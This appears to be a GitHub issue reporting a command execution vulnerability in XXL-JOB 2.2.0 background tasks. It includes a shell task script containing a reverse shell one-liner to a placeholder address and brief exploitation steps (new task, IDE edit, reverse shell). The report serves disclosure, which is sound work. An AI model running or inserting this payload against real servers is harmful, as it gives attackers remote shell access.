Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
后台任务存在命令执行漏洞
#!/bin/bash echo "xxl-job: hello shell" echo "脚本位置:$0" echo "任务参数:$1" echo "分片序号 = $2" echo "分片总数 = $3" echo "`bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/15326 <&1'`" echo "Good bye!" exit 0
The text was updated successfully, but these errors were encountered:
No branches or pull requests
后台任务存在命令执行漏洞
Which version of XXL-JOB do you using?
XXL-JOB 2.2.0
利用流程
新建任务
选择IDE 编辑
反弹shell
Code.
The text was updated successfully, but these errors were encountered: